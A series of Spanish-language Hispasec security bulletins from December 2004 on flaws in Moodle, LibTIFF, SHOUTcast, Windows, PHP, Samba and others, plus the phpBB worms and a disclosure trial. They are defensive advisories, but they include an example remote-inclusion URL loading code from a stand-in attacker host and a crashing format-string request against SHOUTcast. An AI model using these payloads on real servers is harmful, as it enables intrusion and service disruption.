viernes, 31 de diciembre de 2004

Vulnerabilidades en Moodle

Las versiones 1.4.2 y anteriores de Moodle son vulnerables a dos tipos
de ataque que conllevan un riesgo para los usuarios de este conocido
sistema de administración de cursos.

Moodle es una plataforma de enseñanza desarrollada en PHP y traducida
a mas de 50 idiomas que se encuentra bajo licencia Open Source, sus
funcionalidades y facilidad para adaptarla ha conseguido que se
encuentre ampliamente difundida.

La primera vulnerabilidad es un Cross Site Scripting (XSS) que se
encuentra en el archivo "/mod/forum/view.php", este se debe a la
carencia de comprobaciones o filtrado de caracteres de la variable
"search" lo que permite que un atacante mediante la publicación o
envío de urls capture las sesiones de los usuarios.

La segunda vulnerabilidad permite la descarga de los archivos que
contienen las sesiones en el servidor, esta a su vez se debe a que
el código permite la introducción de ".." en el camino del que se
obtiene el archivo, de esta manera es posible acceder al directorio
"sessions" que se encuentra dentro del directorio "moodledata" donde
está permitido el acceso. Haciendo uso de la vulnerabilidad de XSS
podremos consultar el contenido de la variable de sesión del usuario.

Ambas vulnerabilidades se encuentran ya corregidas en la versión 1.4.3
disponible en la página de descarga. Desde Hispasec recomendamos
actualizar lo antes posible.


Francisco Santos
fsantos@hispasec.com


Más información:

Última versión de Moodle:
http://moodle.org/download/

Moodle:
http://moodle.org/

Multiple Vulnerabilities in Moodle:
http://securityfocus.com/archive/1/385561/2004-12-21/2004-12-27/0

jueves, 30 de diciembre de 2004

Vulnerabilidades de desbordamiento de enteros en LibTIFF

Se han descubierto dos vulnerabilidades en la librería de procesado de
imágenes LibTIFF que pueden causar el compromiso del sistema tras
tratar la información de una imagen tiff maliciosamente creada.

La librería LibTIFF usada para leer y escribir imágenes en formato tiff
se utiliza habitualmente en sistemas UNIX. Múltiples programas tanto de
escritorio como en servidores web hacen uso de ella para permitir el
tratamiento de este tipo de imágenes, de ahí el riesgo que generan
estas vulnerabilidades.

La primera se encuentra en la función TIFFFetchStripThing() encargada
del análisis de las imágenes tiff, cuando esta acepta un entero
concreto excesivamente grande se consigue copiar un búfer enviado por
el usuario a la memoria heap, teniendo como fin causar un
desbordamiento en el heap y el posterior control.

La segunda se debe a la falta de validación de los parámetros incluidos
en la cabecera la imagen que adecuadamente tratados provocan que no se
reserve el espacio de memoria necesario y posteriormente se sobrescriba
esta memoria con el código especialmente creado por el atacante.

Ambas vulnerabilidades tienen como resultado final la ejecución de
código con los permisos que tuviera el usuario con el que corre la
aplicación, por tanto desde Hispasec recomendamos actualizar a la
versión mas actual (3.7.1) y parchearla con el siguiente código:

>>>
--- tif_dirread.c.bak 2004-12-19 21:04:00.000000000 +0300
+++ tif_dirread.c 2004-12-19 21:04:03.000000000 +0300
@@ -71,7 +71,7 @@
/*
* XXX: Check for integer overflow.
*/
- if (elem_size && bytes / elem_size == nmemb)
+ if (nmemb && elem_size && bytes / elem_size == nmemb)
cp = (char*)_TIFFmalloc(bytes);

if (cp == NULL)
<<<

las fuentes tif_dirread.c y tif_fax3.c.

A su vez habrá que recompilar todos los programas que hicieran
uso de esta librería, mientras tanto no se deberían aceptar
imágenes en este formato de fuentes no confiables.


Francisco Santos
fsantos@hispasec.com


Más información:

Última versión de LibTIFF
ftp://ftp.remotesensing.org/pub/libtiff/tiff-3.7.1.tar.gz

libtiff STRIPOFFSETS Integer Overflow Vulnerability
http://www.idefense.com/application/poi/display?id=173

libtiff Directory Entry Count Integer Overflow Vulnerability
http://www.idefense.com/application/poi/display?id=174

miércoles, 29 de diciembre de 2004

El jucio Tegam vs. Guillermito se celebrará el 4 de enero de 2005

Tras el aplazamiento de última hora, el juicio que enfrenta a la
empresa Tegam contra el científico francés Guillaume T. se celebrará
el próximo 4 de enero en Tribunal de Grande Instance de Paris. En
juego la criminalización del full-disclosure y, por ende, de la
seguridad informática.

Como nuestros lectores recordarán, puesto que en Hispasec venimos
realizando un seguimiento del caso, Tegam sigue un proceso judicial
contra el científico francés Guillaume T., apodado "Guillermito", por
publicar un informe técnico con detalles y pruebas de concepto que
demostraba que el software antivirus Viguard no detectaba el 100% de
los virus, tal y como anunciaba la empresa desarrolladora.

Transcurridos más de dos años desde la denuncia, el juicio debería
haberse celebrado el pasado 5 de octubre. En una jugada de última
hora, Tegam solicitó un aplazamiento del juicio para preparar con
más tiempo el mismo, al que Guillaume T. y sus abogados accedieron.

Entre las hipótesis que se barajaron para este aplazamiento destacaba
la expectación que había alcanzado el juicio, que se celebraría de
forma pública, y al que ya habían anunciado su asistencia periodistas
y personas interesadas del mundillo de la seguridad informática.

Finalmente el juicio, al que estamos todos invitados, se celebrará
el próximo 4 de enero en París. Más indicaciones para llegar a la
sala del juicio en la siguiente dirección
http://www.u-blog.net/eolas/note/115

En una de sus recientes notas, Guillaume T. comentaba, no sin cierta
ironía, como había recibido en los últimos días varias consultas
sobre sus investigaciones y vulnerabilidades que había descubierto
en diverso software de esteganografía, que publicó de forma similar
al caso del antivirus Viguard de Tegam.

Lo curioso, decía Guillaume, es que las consultas provenían de algunas
de las empresas financiadas con medio millón de dólares por el
Ministerio de Justicia de EE.UU., donde van a crear un Centro de
Análisis e Investigación en Esteganografía con la excusa del
terrorismo. Aunque poco tiene que ver, como bien afirma Guillaume
"no hay nada como el miedo para abrir la cartera de consumidores y
ministerios".

El caso es que mientras que en EE.UU. las investigaciones de
Guillaume T. son apreciadas para proyectos gubernamentales,
teóricamente para luchar contra el terrorismo, en Francia han servido
para llevarlo a un juicio donde Tegam ha llegado a tachar a Guillaume
de terrorista.

Recordemos que en un principio Tegam Internacional emprendió una
agresiva campaña de marketing, con anuncios en publicaciones donde
literalmente llamaba "terrorista informático" a "Guillermito".
Acusación que cobra una especial relevancia si tenemos en cuenta que
apenas habían transcurridos unos meses desde el 11 de septiembre.
Posteriormente emprendería acciones judiciales contra Guillaume T.
por presunta "falsificación de programas informáticos y ocultación
de estos delitos", escudándose para ello en varios artículos del
código de la propiedad intelectual y el código penal.

El juez de instrucción designó a un experto informático para analizar
los argumentos y pruebas técnicas del caso, que ha concluido en su
informe:

- que Guillaume T. desensambló, utilizó y publicó elementos y detalles
del programa informático Viguard, que excedían las modificaciones que
un simple usuario puede realizar con fines de compatibilidad para una
utilización personal, permitiendo burlar las protecciones que
anunciaba el producto.

- que Guillaume T. dispone de competencias incuestionables en materia
de virus y antivirus, y que las vulnerabilidades en Viguard
denunciadas en el informe de Guillaume son pertinentes.

Basándose en el informe del experto informático, el juez de instrucción
desestimó la mitad de los cargos contra Guillaume, en concreto los
relacionados con la "ocultación de delitos". Si bien se debía celebrar
un juicio atendiendo a los cargos de "falsificación", que el juez
estimaba pertinentes al poder atentar contra los derechos de propiedad
intelectual de Tegam Internacional por publicar detalles del código de
Viguard sin su autorización.

En definitiva, Guillaume T. tenía razón cuando denunció las
vulnerabilidades en el producto de Viguard, demostrando que la
publicidad emitida por Tegam Internacional era falsa. Sin embargo,
el método empleado por Guillaume, que básicamente consistió en publicar
un informe técnico y ejemplos reales a modo de pruebas de concepto, son
motivo para, al menos, llevarlo a juicio.

Sin duda nos encontramos ante un juicio cuyo fallo puede marcar un
antes y un después en la investigación y publicación de
vulnerabilidades. Si Guillaume T. es condenado, se creará un precedente
en Francia que criminaliza el full disclosure (divulgación total en
materia de seguridad informática).

Nos encontraríamos en un callejón sin salida, que afectaría de lleno a
la propia seguridad informática. Si denuncias una vulnerabilidad sin
pruebas puedes ser llevado a juicio por difamación, si por el
contrario realizas un análisis técnico y publicas pruebas de concepto
te podrían acusar de falsificación.

Los derechos de unos terminan donde comienzan los de los demás, y en
este caso Tegam Internacional no debe poder escudarse en la propiedad
intelectual para tapar una publicidad falsa y esconder fallos en su
software. En juego no anda sólo la posible condena a Guillaume, sino
la seguridad de los usuarios, que no debe quedar supeditada a los
intereses comerciales de los propios desarrolladores y distribuidores.
¿Qué garantías y defensa tendrían los usuarios sin la existencia de
investigaciones independientes?


Bernardo Quintero
bernardo@hispasec.com


Más información:

27/09/2004 Se aplaza el juicio Tegam vs. "Guillermito"
http://www.hispasec.com/unaaldia/2165

16/09/2004 Tegam vs. Guillermito, segundo asalto
http://www.hispasec.com/unaaldia/2154

20/05/2004 Juicio contra la seguridad informática y el "full disclosure"
http://www.hispasec.com/unaaldia/2034

martes, 28 de diciembre de 2004

El fin de Windows NT

A partir del 1 de enero de 2005 Microsoft no publicará nuevos parches
de seguridad para la familia Windows NT 4.0. Acaba así la vida de esta
plataforma que, de continuar en producción, puede suponer un
importante talón de Aquiles para la continuidad de negocio de muchas
organizaciones.

Windows NT Server 4.0 se lanzó en septiembre de 1996 y, como bien
recuerda Microsoft, llevan comunicando desde septiembre de 2001 que
su ciclo de vida finalizaría con la entrada del nuevo año.

Sin embargo, a falta de unos pocos días para dar la bienvenida al
2005, aun son muchas las organizaciones que mantienen Windows NT en
puntos estratégicos, como servidores de archivos y/o aplicaciones en
la intranet, e incluso como servidor en Internet.

El que después de ocho años aun esté en producción dice mucho a favor
de Windows NT, que supuso un importante avance cualitativo en el que
se han basado sus sucesores en Windows. Sin embargo, con el fin del
ciclo de vida marcado por Microsoft, ya no hay excusa para alargar
aun más su permanencia en las organizaciones.

Aunque en muchos casos haya sido más una cuestión de comodidad y
continuidad, la máxima "si funciona, no lo toques", tal vez fruto de
malas experiencias con actualizaciones y migraciones, a partir de
ahora los riesgos a asumir por no migrar son mucho mayores. Imaginemos
por un momento las consecuencias y el impacto que puede ocasionar una
nueva vulnerabilidad como la que explotó el gusano Sasser.

Sirva este recordatorio como aviso de última hora para todas aquellas
empresas que aun mantienen sistemas Windows NT. No se trata de un
llamamiento masivo a la migración a Windows 2003, como recomienda
Microsoft, deben de estudiarse todas las alternativas, que no
necesariamente pasan por Windows. Lo que sí recomendamos
encarecidamente es que se planteen, de manera independiente a la
elección de su sucesor, el fin de Windows NT.


Bernardo Quintero
bernardo@hispasec.com


Más información:

Windows NT 4.0: Information About the End of the Support Cycle
http://www.microsoft.com/technet/archive/winntas/ntendlife.mspx

lunes, 27 de diciembre de 2004

Nuevo gusano para servidores web con PHP

Este nuevo espécimen puede infectar cualquier sitio web PHP que
contenga ciertos errores de programación. Al igual que "Santy",
también utiliza motores de búsqueda para localizar webs
potencialmente vulnerables, en esta ocasión Google Brasil y Yahoo.

Aunque en principio algunas casas antivirus lo han relacionado con el
gusano Santy que aprovechaba vulnerabilidades de phpBB, en realidad se
trata de un nuevo gusano que puede afectar a cualquier sitio web que
utilice PHP y que no haya sido programado de forma segura.

Es importante que los antivirus modifiquen el nombre dado al gusano,
que en un principio ha sido tratado como si fuera una variante de
Santy. Aunque tiene muchas similitudes, es importante tratarlo como
un nuevo gusano, ya que de lo contrario puede crear confusión si los
webmasters y programadores PHP piensan que sólo afecta a los sitios
web con una versión vulnerable de phpBB. En este sentido Kaspersky
lo ha pasado a denominar "Spyki" (Net-Worm.Perl.Spyki).

El nuevo gusano, escrito en Perl, aprovecha si el programador de la
página PHP ha hecho uso de las funciones include() y require() sin
filtrar adecuadamente los parámetros de entrada, lo que facilita al
atacante, o en este caso al gusano, insertar y ejecutar archivos en
el servidor de forma arbitraria.

En realidad se trata de una de las reglas básicas de la programación
segura que todo diseñador web debe tener en cuenta. Nunca debe de
abrir un archivo basándose en un parámetro externo sin comprobar
la validez del mismo. Pese a ello, es un error frecuente el permitir
hacer referencias a archivos externos, o internos saliendo de la
raíz pública del web, a través de un parámetro en la URL.

De forma que si nosotros tenemos un script para abrir archivos HTML
del servidor web, que por ejemplo podemos llamar de esta forma:

http://nuestroservidor/abrepagina.php?htm=index.htm

Un atacante podría provocar que cargara en su lugar un script
malicioso, o un gusano como en el caso que nos ocupa, de la forma:

http://nuestroservidor/abrepagina.php?htm=http://atacante/gusano.php

La solución pasa por evitar parámetros de forma arbitraria cuando
programamos el script PHP, filtrando todas las referencias que no
se ajusten a las páginas legítimas del servidor web.


Bernardo Quintero
bernardo@hispasec.com



domingo, 26 de diciembre de 2004

Vulnerabilidad de formateo de nombre en SHOUTcast

Se ha descubierto una vulnerabilidad en el formateo de cadenas en las
versiones de SHOUTcast 1.9.4 y anteriores que permite la ejecución
remota de código por parte de un atacante.

SHOUTcast es un sistema de emisión de audio en directo basado en winamp
y desarrollado por los creadores del mismo (Nullsoft).

El problema se encuentra al realizar peticiones al servidor que contienen
nombres de archivo especialmente creados, estos usan caracteres de escape
a los que se le añaden como argumento un código a ejecutar. Por ejemplo,
con una simple petición a:
http://ip:8000/content/%n.mp3
se puede provocar la caída del servidor de SHOUTcast.

La vulnerabilidad ha sido confirmada en las versiones SHOUTcast DNAS/Linux
y actualmente ya circula código que hace uso malicioso de la misma.


Francisco Santos
fsantos@hispasec.com


Más información:

SHOUTcast remote format string vulnerability
http://www.securityfocus.com/archive/1/385350/2004-12-20/2004-12-26/0

SHOUTcast remote format string vulnerability (Aviso original)
http://www.cc-team.org/index.php?name=artykuly&show=163

SHOUTcast Homepage:
http://www.shoutcast.com

sábado, 25 de diciembre de 2004

Navidad negra para la seguridad de Windows

En los últimos días, y coincidiendo con la víspera de Noche Buena, se
han publicado en Internet tres vulnerabilidades para Windows, a las
que se suman otras tantas que días atrás se habían dado a conocer
sobre Internet Explorer. En total seis vulnerabilidades, algunas de
ellas catalogadas como críticas, para las que Microsoft aun no ha
publicado parche.

La primera de las vulnerabilidades, que según el reporte original
afecta a todas las versiones de Windows, tiene su origen en el
programa winhlp32.exe, encargado de procesar los archivos de ayuda
.HLP. Se han detectado en esta aplicación un desbordamiento de heap y
un desbordamiento de entero que podrían ser explotables mediante un
archivo de ayuda especialmente diseñado.

A efectos prácticos, un atacante podría crear un archivo de ayuda con
extensión .HLP y hacer que un usuario con Windows lo abriera, momento
en el cual se ejecutaría el código arbitrario del atacante, con la
posibilidad de llevar a cabo cualquier acción y comprometer el
sistema.

La recomendación, a la espera de una solución por parte de Microsoft,
es evitar abrir cualquier archivo .HLP que nos envíen, y en general
cualquier archivo que expresamente no hayamos solicitado, aunque
provenga de una fuente confiable.

La segunda de las vulnerabilidades está basada en un desbordamiento
de entero en la función LoadImage de USER32, biblioteca de Windows
destinada a cargar los iconos, cursores y bitmaps.

A efectos prácticos, un atacante podría crear un archivo .bmp,
.cur, .ico o .ani e incluirlo en una página web o un e-mail que,
al ser visualizado por un usuario, provocara la ejecución de código
arbitrario y el compromiso del sistema. Este problema no afectaría
a los usuarios con Windows XP y el Service Pack 2 instalado.

La prevención, a la espera de la solución por parte de Microsoft,
de nuevo pasa por evitar abrir archivos que nos envíen y que
expresamente no hayamos solicitado, configurar nuestro cliente de
correo para no procesar automáticamente los mensajes HTML, y no
visitar páginas web que no sean de fuentes confiables.

La tercera vulnerabilidad para Windows, la menos crítica, podría
ser explotada para llevar a acabo ataques por denegación de
servicios (DoS), aprovechando un problema del kernel de Windows
al procesar archivos .ani especialmente diseñados. En esta
ocasión tampoco afecta a Windows XP SP2. La prevención, a falta
de la pertinente actualización, pasa por seguir las recomendaciones
anteriormente descritas.

Los exploits o pruebas de concepto diseñadas para demostrar
las vulnerabilidades han sido procesadas por el servicio
antivirus de Hispasec, VirusTotal (http://www.virustotal.com).

eTrust-Iris, de Computer Associates, es el único motor en el
momento de escribir estas líneas que detecta el exploit para
la vulnerabilidad en winhlp32.exe como Win32/WhlpHeapOvrflw.Exploit.Tro.

El exploit del desbordamiento de entero en USER32 ha sido
detectado por e-Trust-Iris como Loadimage.Exploit.Trojan y
Symantec como Bloodhound.Exploit.19.

En el caso de la tercera vulnerabilidad, los dos exploits
publicados para el ataque de denegación de servicio al kernel
basado en un archivo ANI son detectados también por eTrust-Iris
como Win32/AniFile.Exploit.Trojan. Mientras que Symantec sólo
reconoce uno de los dos exploits como Bloodhound.Exploit.20.

El sistema de distribución de muestras de VirusTotal envía
automáticamente y en tiempo real las muestras que han dado
positivas por algún antivirus al resto de laboratorios que
participan en este servicio y no las detectan, facilitando a
dichos laboratorios el acceso a las últimas amenazas y ayudando
en la protección de sus usuarios. Por ello esperamos que en
breve se amplíe el número de antivirus que detecten los exploits.


Bernardo Quintero
bernardo@hispasec.com


Más información:

Microsoft Windows winhlp32.exe Heap Overflow Vulnerability
http://www.securityfocus.com/archive/1/385332

Microsoft Windows LoadImage API Integer Buffer overflow
http://www.securityfocus.com/archive/1/385342

Microsoft Windows Kernel ANI File Parsing Crash and DOS Vulnerability
http://www.securityfocus.com/archive/1/385340

viernes, 24 de diciembre de 2004

Vulnerabilidad en WinRAR

WinRAR, el popular cliente de compresión de archivos, se ve afectado
por un problema de seguridad al realizar la descompresión de un archivo
tipo ZIP especialmente mal formado.

Para poder conseguir explotar esta vulnerabilidad se deben de dar una
serie de factores que mitigan el problema. Como es el caso de que el
atacante tendría que convencer a la víctima para que intente borrar
determinado archivo del paquete especialmente mal formado. Si esto
se consiguiera se realizaría un desbordamiento de búfer y la posterior
inyección de código en el sistema atacado.

Otro factor que palia parcialmente la trascendencia de esta
vulnerabilidad es que WinRAR trunca los nombres de archivos a 1023
bytes por lo que el tamaño máximo para realizar un desbordamiento de
búfer está limita a 500 bytes.

Las versiones afectadas por este problema son la 3.41 y anteriores.


Antonio Román
roman@hispasec.com


Más información:

WinRAR Corrupt ZIP File Vulnerability
http://www.securiteam.com/windowsntfocus/6B00J1PC1Y.html

WinRAR Corrupt ZIP File Vulnerability
http://msmvps.com/donna/archive/2004/12/17/26109.aspx

WinRAR Corrupt ZIP File Vulnerability
http://www.security-protocols.com/modules.php?name=News&file=article&sid=2331

RARLAB
http://www.rarlabs.com/

jueves, 23 de diciembre de 2004

Vulnerabilidad en ZOPE

Las versiones 2.* actuales de ZOPE, en sus configuraciones por defecto,
permiten que un usuario con permisos de creación o modificación de
objetos ZPT o DTML pueda "tirar" el servidor de aplicaciones.

Zope es un servidor de aplicaciones, escrito en lenguaje Python.
Su extrema flexibilidad, características novedosas (base de datos de
"objetos", fácil extensibilidad, componentes) y su bajo precio (se
trata de una solución "open source") lo hacen especialmente atractivo
para desarrollos web.

Las versiones 2.7.* (en producción) y 2.8 (en desarrollo) contienen
un error de programación en el módulo de control de acceso
"cAccessControl.c" que permite que un usuario con permisos de creación
o modificación de objetos ZPT o DTML pueda provocar la caída del
servidor ZOPE.

La próxima actualización de ZOPE 2.7 y 2.8 solucionará el problema.
Mientras tanto la única opción disponible consiste en configurar el
servidor ZOPE para desactivar el módulo de control de acceso
"cAccessControl.c" y sustituirlo por el módulo de control de acceso en
Python. Naturalmente esta sustitución supone una pequeña pérdida de
rendimiento, pero es la única opción disponible para aquellos entornos
ZOPE que permitan el acceso de creación o modificación de objetos ZPT
o DTML a usuarios potencialmente maliciosos.

Para que desactivar el módulo de control de acceso en C y sustituirlo
por el módulo en python hay que eliminar el comentario de la siguiente
línea de código en "zope.conf":

security-policy-implementation python

Tras dicho cambio, hay que reiniciar el servidor ZOPE.

En cuando se publique una versión corregida de ZOPE, debe volver a
comentarse esa línea para que ZOPE se ejecute con un rendimiento óptimo.


Jesús Cea Avión
jcea@hispasec.com


Más información:

Security Advisory for Zope 2.7 + 2.8
http://zope.org/Members/ajung/security_advisory

Security fix Zope 2.7 and 2.8
http://www.zopezen.org/Members/andy/news_item.2004-12-09.0864633962

[Zope-dev] zpt code crashes zope 2.7.3
http://mail.zope.org/pipermail/zope-dev/2004-December/024092.html

The Web Site for the Zope Community
http://www.zope.org/

miércoles, 22 de diciembre de 2004

Gusano Santy.A utiliza a Google para infectar servidores web con phpBB

El gusano Santy.A, escrito en Perl, infecta automáticamente los
servidores web que utilicen una versión vulnerable de phpBB,
modificando además sus páginas webs. En el momento de escribir estas
líneas Hispasec cuenta los servidores infectados por miles. El gusano
no afecta a los sistemas de los usuarios, únicamente a los servidores
web con una versión de phpBB anterior a la 2.0.11.

phpBB es una popular aplicación para la creación de sitios y foros
web muy extendida en Internet. Las versiones de phpBB anteriores a la
2.0.11 contienen varias vulnerabilidades, una de ellas es la que
aprovecha el gusano Santy.A para infectar los servidores web
afectados. En concreto se trata de un problema en el archivo
"viewtopic.php" al no procesar adecuadamente los datos enviados a
través del parámetro "highlight", lo que permite a un atacante, o a
un gusano como es el caso que nos ocupa, ejecutar comandos arbitrarios
de forma remota.

Santy.A contiene en su código una rutina que realiza constántemente
búsquedas en Google de 100 URLs que contengan la cadena
"viewtopic.php", con el fin de localizar sitios webs con phpBB
instalado y, por tanto, potencialmente vulnerables. Para evitar
siempre localizar a los mismos 100 sitios webs, el gusano incluye en
cada nueva búsqueda un número aleatorio para indicar a partir de que
resultado quiere el listado, de entre los más de 4 millones de
páginas que Google tiene indexadas con las características
especificadas en la búsqueda del gusano.

El gusano realiza una petición para explotar la vulnerabilidad
anteriormente comentada a cada una de las URL conteniendo la cadena
"viewtopic.php" que Google le devuelve. Si el servidor web al que
realiza dicha petición tiene instalada una versión de phpBB anterior
a la 2.0.11, el gusano lo infecta, copiándose en el sistema con el
nombre de archivo "m1ho2of" y ejecutándose a través de "perl -e".
A partir de ese momento el servidor web infectado comienza su
rutina para localizar a través de Google otras posibles víctimas.

Adicionalmente Santy.A incluye en su código una rutina para buscar
en los sistemas infectados todos los archivos con extensión .htm,
.php, .asp, .shtm, .jsp y .phtm y los sobrescribe con el código
HTML de una página web con fondo negro y color de texto rojo que
incluye el siguiente mensaje, donde (*) es un número que hace las
veces de contador:

This site is defaced!!!
NeverEverNoSanity WebWorm generation *

Aunque las casas antivirus han reaccionado a posteriori publicando
firmas para su detección, en esta ocasión no han sido muy útiles,
sobre todo si tenemos en cuenta que los sistemas afectados son
servidores webs, muchos de ellos Unix o Linux, que no suelen
contar con antivirus residentes instalados para analizar todos
los archivos que se escriben en el sistema y/o dispositivos
antivirus que filtren el tráfico previamente.

La prevención pasa por que todos los servidores con phpBB instalen
la versión 2.0.11 que corrige la vulnerabilidad, disponible en la
dirección: http://www.phpbb.com/downloads.php


Bernardo Quintero
bernardo@hispasec.com



martes, 21 de diciembre de 2004

Actualización de seguridad de Ethereal

Las versiones no actualizadas de ethereal adolecen de varias
vulnerabilidades que pueden permitir la caída del proceso e, incluso,
la ejecución de código arbitrario.

Ethereal es un analizador de protocolos de red gratuito para entornos
Unix y Windows. Permite examinar datos directamente 'esnifándolos' de la
red o de un archivo de captura, y posee diversas utilidades para hacer
más cómodo el trabajo con estos datos, como un potente lenguaje de
filtrado de visualización.

Las versiones no actualizadas de Ethereal contienen las siguientes
vulnerabilidades:

* Un error de programación en las rutinas de disección de DICOM permite
matar el proceso ethereal. Bajo ciertas circunstancias puede permitir la
ejecución de código arbitrario.

* Un "timestamp" RTP inválido puede provocar el cuelgue de Ethereal,
generando un fichero temporal de gran tamaño, potencialmente llenando el
disco duro.

* El diseccionador HTTP puede liberar varias veces el mismo bloque de
memoria, provocando la caída del ethereal. Bajo ciertas condiciones
puede permitir la ejecución de código arbitrario.

* Un paquete SMB mal formateado puede provocar el cuelgue de ethereal,
consumiendo todo el tiempo de CPU disponible.

Hispasec recomienda actualizar con urgencia a la versión 0.10.8 de Ethereal.


Jesús Cea Avión
jcea@hispasec.com


Más información:

Ethereal 0.10.8 released - Wednesday, December 15, 2004
http://www.ethereal.com/news/item_20041215_01.html

Ethereal
http://www.ethereal.com/

lunes, 20 de diciembre de 2004

Nueva técnica de "phishing" afecta a Internet Explorer

Descubierta una vulnerabilidad XSS en el control ActiveX DHTML Edit de
Internet Explorer que puede ser especialmente aprovechada en ataques
de tipo "phishing". A efectos prácticos, por ejemplo, un atacante
podría simular una página web segura de una entidad bancaria, sin
que el usuario pueda detectar anomalías en la dirección ni en el
certificado de seguridad que aparece en el navegador.

Como prueba de concepto, para comprobar si su versión y configuración
de Internet Explorer es vulnerable, en la siguiente página encontrará
un enlace a www.bbvanet.com. Si pincha el enlace y su navegador es
vulnerable, aparecerá una nueva ventana, donde podrá visualizar en el
campo dirección la URL https://www.bbvanet.com/, y en la barra de
estado el candado cerrado que informa que se encuentra en una web
segura. Si hace doble click en el candado, observará el certificado
de seguridad legítimo de www.bbvanet.com. Pese a todas esas
indicaciones, la web que se visualiza es de Hispasec.

http://www.hispasec.com/directorio/laboratorio/Software/tests/xssie.html

El problema afecta a Internet Explorer 6.0, incluyendo sistemas
con todas las últimas actualizaciones instaladas y Windows XP con
Service Pack 2.

Para prevenir este tipo de ataques, y a la espera de que Microsoft
publique un parche para corregir el problema, los usuarios de
Internet Explorer pueden optar por desactivar la secuencias de
comandos ActiveX en la configuración de su navegador:

menú Herramientas -> Opciones -> pestaña Seguridad -> botón Nivel
personalizado -> Secuencias de comandos ActiveX -> Desactivar

Si recarga la página con esta nueva configuración de Internet
Explorer, o la visita desde un navegador no vulnerable, como Firefox,
podrá comprobar que al pinchar en el enlace no se abre ninguna nueva
ventana.


Bernardo Quintero
bernardo@hispasec.com


Más información:

Original PoC - Paul, GreyHats Security Group
http://freehost07.websamba.com/greyhats/abusiveparent.htm

Secunia PoC
http://secunia.com/internet_explorer_cross-site_scripting_vulnerability_test/

domingo, 19 de diciembre de 2004

Actualización de seguridad de PHP

Las versiones no actualizadas de PHP contienen diversas vulnerabilidades
que permiten a un atacante remoto provocar caídas de servicio y, bajo
ciertas circunstancias, la ejecución de código arbitrario en el servidor.

PHP (PHP: Hypertext Preprocessor) es un popular lenguaje de scripting
de propósito general, idóneo para el desarrollo web al ser posible su
integración dentro del HTML. Se trata de un proyecto de código abierto
muy utilizado para la confección de páginas web dinámicas (gracias a la
capacidad de lanzar consultas a bases de datos).

Las ocho vulnerabilidades resueltas, de las que no ha transcendido
demasiada información, son:

* Corrupción de memoria en "shmop_write()".

* Desbordamiento entero en "pack()" y "unpack()".

* Múltiples errores en el código de deserialización, que puede filtrar
información confidencial, la caída del servicio, y la ejecución de
código arbitrario.

* Gestión incorrecta de los caracteres "\0" en "addslashes()".

* Un atacante puede saltarse la protección de "safe_mode" y lanzar
cualquier ejecutable del servidor.

* Un atacante puede acceder a cualquier fichero del sistema, a pesar de
"safe_mode".

* Desbordamiento de búfer en "exif_read_data()".

* Acceso al directorio superior del directorio "upload".

Hispasec recomienda a los administradores de sistemas PHP que actualicen
con urgencia a la versión 4.3.10 o 5.0.3.

Como siempre, Hispasec recomienda también verificar la integridad de los
ficheros, sobre todo si se bajan de "mirrors" en vez de servidor
original. Los "hashes" criptográficos de los ficheros de código fuente
son:

PHP 4.3.10 (tar.bz2) [3,932Kb] - md5: 7e56824dae9679c59a8234eb848aa542
PHP 4.3.10 (tar.gz) [4,778Kb] - md5: 73f5d1f42e34efa534a09c6091b5a21e
PHP 5.0.3 (tar.bz2) [4,500Kb] - md5: fd26455febdddee0977ce226b9108d9c
PHP 5.0.3 (tar.gz) [5,534Kb] - md5: bf89557056ce34d502e20e24071616c7


Jesús Cea Avión
jcea@hispasec.com


Más información:

PHP
http://www.php.net/

PHP 4.3.10 Release Announcement
http://www.php.net/release_4_3_10.php

Version 4.3.10
http://www.php.net/ChangeLog-4.php#4.3.10

Version 5.0.3
http://www.php.net/ChangeLog-5.php#5.0.3

sábado, 18 de diciembre de 2004

Actualización de seguridad de SAMBA

Las versiones no actualizadas de Samba permiten que un atacante remoto
provoque la caída del servicio y ejecute código arbitrario en el
servidor.

Samba es una implementación Unix "Open Source" del protocolo
SMB/NetBIOS, utilizada para la compartición de archivos e impresora en
entornos Windows. Gracias a este programa, se puede lograr que máquinas
Unix y Windows convivan amigablemente en una red local, compartiendo
recursos comunes. Incluso es factible utilizar un servidor Samba para,
por ejemplo, actuar como controlador de un dominio Microsoft Windows.

Las versiones no actualizadas de Samba contienen un desbordamiento
entero que permiten que un atacante remoto, con permisos de acceso a
Samba, pueda "tirar" el servicio y ejecutar código en el servidor.

Hispasec recomienda la actualización urgente a Samba 3.0.10.

Hispasec también recomienda, como siempre, que se compruebe la firma
digital del código Samba que se vaya a instalar, para asegurar su
autenticidad e integridad.


Jesús Cea Avión
jcea@hispasec.com


Más información:

CAN-2004-1154: Integer overflow could lead to remote code execution in
Samba 2.x, 3.0.x <= 3.0.9
http://us1.samba.org/samba/security/CAN-2004-1154.html

Security Release: Samba 3.0.10 Available for Download
http://us1.samba.org/samba/news/#3.0.10

viernes, 17 de diciembre de 2004

Más de un tercio de entidades corrigen sus deficiencias en torno al phishing

Hace un mes Hispasec realizó un estudio en el que se reflejaba que el diseño de un 44% de las páginas web bancarias españolas favorecía el phishing. En este periodo de tiempo más de un tercio de ellas han corregido sus deficiencias.

Queremos recordar que el estudio está centrado en analizar los aspectos de diseño de la primera página web de autenticación del usuario que pueden permitir o facilitar la realización exitosa de ataques de phishing. Todas las entidades bancarias analizadas realizan correctamente la transmisión de datos de forma cifrada, sin embargo algunas de ellas, por motivos de diseño, usabilidad, etc. ocultan la url con https en algún frame, lo que dificulta a los usuarios la comprobación de que se encuentran en el sitio correcto.

Los clientes de cualquier entidad pueden recibir un mensaje incitándoles a visitar un servidor falso, sin posibilidad de que la entidad pueda evitarlo. Sin embargo, el diseño de las páginas web de las entidades financieras es determinante para que el usuario pueda comprobar si realmente se encuentra en el servidor de su banco o, por el contrario, se trata de un servidor web falso que imitando al original trata de robarles sus credenciales.

Las características evaluadas se centran en la posibilidad de que el cliente pueda comprobar de forma sencilla que está conectando con el servidor seguro de la entidad. Para ello se examina el campo de dirección que aparece en el navegador, donde debe estar visible la URL completa, con el dominio al que conecta precedido de https://, así como la existencia del candado cerrado o una llave completa que aparece en la barra de estado (en función del navegador utilizado), icono al que los usuarios pueden hacer doble click para visualizar información detallada del certificado de seguridad y comprobar que pertenece a la entidad bancaria.

